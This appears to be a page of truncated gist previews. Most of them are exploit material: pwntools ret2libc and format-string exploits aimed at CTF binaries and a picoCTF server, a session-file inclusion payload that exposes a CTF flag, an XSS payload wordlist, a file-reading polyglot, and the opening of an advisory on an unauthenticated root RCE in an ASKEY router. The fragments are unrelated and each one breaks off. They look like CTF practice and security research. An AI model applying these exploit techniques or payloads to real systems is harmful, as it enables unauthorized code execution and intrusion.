This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
int main(int argc, char *argv[]) { | |
int i; | |
char s[MAX_CMD_LINE], c; | |
memset(s, 0, MAX_CMD_LINE); | |
// Loop until Ctrl+C is pressed | |
for (i=0; ; i++) { | |
if ((c = getchar()) == EOF) // End Of File reached when reading from a pipe | |
break; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
p = process("./examine32") | |
system = 0xf7e19e70 | |
exit = 0xf7e0cf50 | |
bash = 0xf7f39fcc | |
offset = ??? | |
exploit = "A"*offset+p32(system)+p32(exit)+p32(bash)+"\xff" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
cat=1;food=1;exit=1;{cat,food};{exit,1} | |
1//1;print(open("food","r").read());""" | |
var fs = require('fs');fs.readFile('food','utf8',function(err,contents){ | |
console.log(contents)})//""" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
2to3-2.7 | |
X11 | |
[ | |
ab | |
aclocal | |
aclocal-1.15 | |
addpart | |
addr2line | |
appres | |
apropos |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
#p = process("./echoback") | |
p = remote("2018shell.picoctf.com",37402) | |
e = ELF("./echoback") | |
print p.recv(1024) | |
payload = fmtstr_payload(7, {e.got["puts"]:0x080485ab,e.got["printf"]:e.plt["system"]} , write_size='byte') | |
print len(payload) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
payload : | |
%!/var/lib/php/sessions/sess_t4655hebsafr291praeif7gih2 f | |
.--------------------------------------------------------------------------------------------f | |
/var/lib/php/sessions/sess_t4655hebsafr291praeif7gih2 : | |
flag|s:71:"CTF-BR{1s_th1s_4_0day?1_r34lly_d0nt_know.Pl34s3_c0m3_pl4y_Pwn2Win_CTF!}";name|s:5:"'$.-)"; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Set-Cookie=test=test | |
"--><svg | |
"><script>prompt("exr")< | |
$ | |
$1 | |
$a | |
$account_id | |
$code |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$$ | |
$Any$ | |
$shop$ | |
$your-shop$ | |
%20%44omain%20%3d | |
%2f%2f%2fbing | |
%60x | |
%domain% | |
%user% | |
%your_domain% |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
- | |
. | |
.. | |
... | |
.... | |
.AMRU | |
.json | |
.onion | |
.txt | |
0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Unauthenticated RCE as root on ASKEY router RTF3505VW through GET parameter | |
------------------------------------------------------------------------------ | |
The router RTF3505VW, which is distributed by Vivo, is vulnerable to a unauthenticated RCE via a GET parameter. The vulnerability resides on the /bin/httpd, as it passes a GET parameter to a system call, see the vulnerable portion of the binary below. | |
if (iVar1 != 0) { | |
system("killall ping traceroute > /dev/null 2>&1"); | |
__format = "ping %s -c %s -I %s> %s&"; | |
puVar4 = auStack10144; |